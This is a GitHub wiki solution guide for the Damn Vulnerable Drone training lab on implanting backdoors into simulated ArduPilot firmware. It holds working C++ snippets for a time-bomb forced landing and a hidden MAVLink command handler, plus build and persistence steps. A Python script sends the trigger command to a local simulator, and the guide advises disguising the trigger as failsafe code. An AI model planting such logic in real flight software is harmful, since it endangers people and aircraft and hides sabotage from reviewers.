Firmware Modding - nicholasaleks/Damn-Vulnerable-Drone GitHub Wiki

Modify ArduPilot firmware to implant persistent backdoors directly into the drone’s flight logic


Description

In this scenario, you’ll modify the flight controller firmware source code, inject malicious behavior, recompile the firmware, and replace the drone’s binary inside the Damn Vulnerable Drone simulation environment. Unlike protocol spoofing, this technique directly implants malicious logic inside the binary the drone executes.

Resources


⚠️ Solution Guide

Step 1. Decompile and Review the Current Firmware

Follow the Firmware Decompile scenario to extract and disassemble the drone’s current arducopter binary using Ghidra. This allows you to trace execution paths and identify insertion points for code injection.


Step 2. Modify the ArduPilot Firmware Source

Clone the ArduPilot repository, with its submodules (the build needs them), inside the container you will build in; Step 3 assumes the checkout lives at /opt/ardupilot.

Pick an insertion point in the ArduCopter/ source tree. Useful candidates:

  • mode_guided.cpp (GUIDED mode controller; its run() executes every loop while GUIDED is active)
  • mode_auto.cpp (AUTO mode mission execution)
  • GCS_Mavlink.cpp (dispatch of MAVLink commands received from the GCS)
  • commands.cpp (home position handling)

Example: a time bomb that forces a landing once the flight controller has been up for 30 seconds. millis() counts from firmware start (for SITL, process start), not from arming, and ModeGuided::run() only executes while the vehicle is in GUIDED, so the trigger fires on the first GUIDED loop iteration after that point.

In ArduCopter/mode_guided.cpp, at the top of ModeGuided::run() (ArduPilot 4.x names; older trees use the flat LAND and MODE_REASON_GCS_COMMAND enums):

// Backdoor: force LAND 30 s after boot. Only reached while GUIDED is the active mode.
if (millis() > 30000) {
    gcs().send_text(MAV_SEVERITY_CRITICAL, "Malicious Landing Triggered.");
    copter.set_mode(Mode::Number::LAND, ModeReason::GCS_COMMAND);
    return;  // LAND's controller runs from the next loop; skip the rest of GUIDED
}

Or add a hidden command in ArduCopter/GCS_Mavlink.cpp: a new case in the switch on packet.command inside GCS_MAVLINK_Copter's COMMAND_LONG handler (handle_command_long_packet; newer trees dispatch most commands through handle_command_int_packet instead). The handler returns a MAV_RESULT, so the case must return a result rather than break, otherwise control falls off the end of the function:

case 199:  // unassigned MAV_CMD ID; GCS tooling will not list it
    gcs().send_text(MAV_SEVERITY_NOTICE, "Backdoor command received");
    copter.set_mode(Mode::Number::RTL, ModeReason::GCS_COMMAND);
    return MAV_RESULT_ACCEPTED;

Step 3. Rebuild the Modified Firmware

Inside the container that holds the checkout:

cd /opt/ardupilot
./waf distclean
./waf configure --board sitl
./waf copter

The compiled binary will be available at:

build/sitl/bin/arducopter

Step 4. Replace the DVD Flight Firmware

Copy the modified binary into the DVD flight controller container, overwriting the arducopter binary it runs, and confirm the launch wrapper in the container references /usr/local/bin/arducopter. A SITL process that is already running keeps executing the old code until it is restarted, so restart it (or the container) before testing.


Step 5. Validate the Payload

Reconnect to the DVD simulator with QGroundControl or MAVProxy and exercise the payload:

  • For the time bomb: arm, switch to GUIDED, and wait until the flight controller has been up for about 30 s; LAND should be forced on the next GUIDED loop iteration
  • For the hidden MAV_CMD, connect MAVProxy to the SITL TCP port:
mavproxy.py --master=tcp:127.0.0.1:5760

Then send the injected command with MAVProxy's long command (the command ID followed by the seven parameters, which the handler ignores):

long 199 0 0 0 0 0 0 0

Watch for text responses like:

Backdoor command received

You can observe changes in drone behavior (e.g., RTL, LAND, or armed state toggling).
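The MAVProxy step hides what the injected handler actually receives on the wire. The script below, added here as an example and not part of the DVD wiki or of ArduPilot, builds the COMMAND_LONG frame for command 199 by hand (MAVLink v2 framing and CRC, no pymavlink needed), sends it to the SITL endpoint tcp 127.0.0.1:5760 named on the page, and checks the replies for the three signs the backdoor fired: a COMMAND_ACK for 199, the "Backdoor command received" STATUSTEXT, and a HEARTBEAT reporting RTL (ArduCopter custom_mode 6). Message IDs, wire field order and CRC_EXTRA seeds are those of the MAVLink common dialect; the helper that fabricates reply traffic exists only so the decoders can be checked offline, and its contents are constructed, not captured.

```python
"""Hand-rolled MAVLink v2 for poking the injected COMMAND_LONG 199 handler.
Added example (not DVD wiki or ArduPilot code). IDs, wire field order and CRC_EXTRA
seeds are from the MAVLink common dialect; tcp 127.0.0.1:5760 is the SITL port on the page.
"""
import socket
import struct
import time

MAGIC_V2 = 0xFD
MSG_HEARTBEAT, MSG_COMMAND_LONG, MSG_COMMAND_ACK, MSG_STATUSTEXT = 0, 76, 77, 253
# CRC_EXTRA seeds (common dialect); with a wrong seed the autopilot silently drops the frame.
CRC_EXTRA = {MSG_HEARTBEAT: 50, MSG_COMMAND_LONG: 152, MSG_COMMAND_ACK: 143, MSG_STATUSTEXT: 83}
BACKDOOR_CMD = 199        # unassigned MAV_CMD ID the injected handler listens for
COPTER_MODE_RTL = 6       # ArduCopter custom_mode value for RTL
MAV_RESULT_ACCEPTED = 0

def x25_crc(data: bytes, crc: int = 0xFFFF) -> int:
    """MAVLink's CRC-16/X.25 (CRC-16/MCRF4XX): init 0xFFFF, no final XOR."""
    for b in data:
        tmp = (b ^ (crc & 0xFF)) & 0xFF
        tmp = (tmp ^ (tmp << 4)) & 0xFF
        crc = ((crc >> 8) ^ (tmp << 8) ^ (tmp << 3) ^ (tmp >> 4)) & 0xFFFF
    return crc

def encode_frame(msgid: int, payload: bytes, seq: int = 0, sysid: int = 255, compid: int = 190) -> bytes:
    """v2 framing: trailing zero payload bytes are truncated; CRC covers all bytes after the magic plus the seed."""
    payload = payload.rstrip(b"\x00") or b"\x00"
    header = struct.pack("<BBBBBB", len(payload), 0, 0, seq & 0xFF, sysid, compid) + msgid.to_bytes(3, "little")
    crc = x25_crc(bytes([CRC_EXTRA[msgid]]), x25_crc(header + payload))
    return bytes([MAGIC_V2]) + header + payload + struct.pack("<H", crc)

def encode_command_long(command: int, params=(0.0,) * 7, target_sys: int = 1, target_comp: int = 1) -> bytes:
    """COMMAND_LONG (#76), size-sorted wire order: seven float params, command (u16), target_system,
    target_component, confirmation. The u16 is what `packet.command` in GCS_Mavlink.cpp sees."""
    return encode_frame(MSG_COMMAND_LONG, struct.pack("<7fHBBB", *params, command, target_sys, target_comp, 0))

def decode_frame(frame: bytes):
    """Check magic, length and CRC (with the per-message seed); return (msgid, payload) or raise."""
    if len(frame) < 13 or frame[0] != MAGIC_V2 or len(frame) < 12 + frame[1]:
        raise ValueError("not a complete MAVLink v2 frame")
    plen, msgid = frame[1], int.from_bytes(frame[7:10], "little")
    if msgid not in CRC_EXTRA:
        raise ValueError(f"no CRC_EXTRA for msgid {msgid}")
    expected = x25_crc(bytes([CRC_EXTRA[msgid]]), x25_crc(frame[1:10 + plen]))
    if expected != struct.unpack_from("<H", frame, 10 + plen)[0]:
        raise ValueError("CRC mismatch")
    return msgid, frame[10:10 + plen]

def decode_command_long(payload: bytes) -> dict:
    f = struct.unpack("<7fHBBB", payload.ljust(33, b"\x00"))  # re-expand truncated zeros
    return {"params": f[:7], "command": f[7], "target_system": f[8], "target_component": f[9]}

def split_frames(buf: bytes):
    """Cut a TCP byte stream into complete v2 frames; return (frames, unconsumed tail)."""
    frames, i = [], 0
    while i + 2 < len(buf):
        if buf[i] != MAGIC_V2:
            i += 1
            continue
        end = i + 12 + buf[i + 1] + (13 if buf[i + 2] & 0x01 else 0)  # incompat bit 0: signed
        if end > len(buf):
            break
        frames.append(buf[i:end])
        i = end
    return frames, buf[i:]

def backdoor_evidence(frames) -> dict:
    """Signs the hidden handler ran: ACK for 199, its 'Backdoor' STATUSTEXT, HEARTBEAT in RTL. Bad-CRC frames are ignored."""
    ev = {"acked": False, "statustext": None, "rtl": False}
    for frame in frames:
        try:
            msgid, payload = decode_frame(frame)
        except ValueError:
            continue
        if msgid == MSG_COMMAND_ACK:
            command, result = struct.unpack("<HB", payload.ljust(3, b"\x00")[:3])
            ev["acked"] |= command == BACKDOOR_CMD and result == MAV_RESULT_ACCEPTED
        elif msgid == MSG_STATUSTEXT:
            text = payload.ljust(51, b"\x00")[1:51].split(b"\x00", 1)[0].decode("ascii", "replace")
            ev["statustext"] = text if "Backdoor" in text else ev["statustext"]
        elif msgid == MSG_HEARTBEAT:
            ev["rtl"] |= struct.unpack_from("<I", payload.ljust(9, b"\x00"))[0] == COPTER_MODE_RTL
    return ev

def sample_reply_stream(corrupt_statustext: bool = False) -> bytes:
    """Constructed sample (not a capture) of the autopilot's replies: COMMAND_ACK for 199, the handler's
    STATUSTEXT (severity 5 = NOTICE), a HEARTBEAT already in RTL. corrupt_statustext flips one payload byte."""
    ack = encode_frame(MSG_COMMAND_ACK, struct.pack("<HB", BACKDOOR_CMD, MAV_RESULT_ACCEPTED), sysid=1, compid=1)
    text = encode_frame(MSG_STATUSTEXT, bytes([5]) + b"Backdoor command received".ljust(50, b"\x00"), sysid=1, compid=1)
    if corrupt_statustext:
        text = text[:12] + bytes([text[12] ^ 0x20]) + text[13:]
    # HEARTBEAT: custom_mode u32, type 2 quadrotor, autopilot 3 ArduPilot, base_mode, status, mavlink version
    hb = encode_frame(MSG_HEARTBEAT, struct.pack("<IBBBBB", COPTER_MODE_RTL, 2, 3, 0x81, 4, 3), sysid=1, compid=1)
    return ack + text + hb

def trigger_backdoor(host: str = "127.0.0.1", port: int = 5760, listen_seconds: float = 5.0) -> dict:
    """Live use against DVD SITL: send COMMAND_LONG 199, collect replies briefly, report the evidence."""
    buf, deadline = b"", time.monotonic() + listen_seconds
    with socket.create_connection((host, port), timeout=1) as s:
        s.sendall(encode_command_long(BACKDOOR_CMD))
        while time.monotonic() < deadline:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                continue
            if not chunk:
                break
            buf += chunk
    return backdoor_evidence(split_frames(buf)[0])

if __name__ == "__main__":
    print(trigger_backdoor())
```

Run it with python3 once the modified SITL is up; trigger_backdoor() returns all three indicators set if the handler ran. Frames that fail the CRC check are dropped rather than trusted, which is also why a frame built with a wrong CRC_EXTRA seed never reaches your case 199 in the first place.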


Step 6. Add Persistence or Evade Detection (Optional)

To persist your payload:

  • Bake the binary into the image rather than only the running container: add a COPY of your build/sitl/bin/arducopter to /usr/local/bin/arducopter in the DVD Dockerfile and rebuild the image, so the payload survives container recreation
  • Hide the logic: add random delays, extra conditional checks, or nest the trigger inside an existing branch (for example an existing failsafe check) so it reads like legitimate code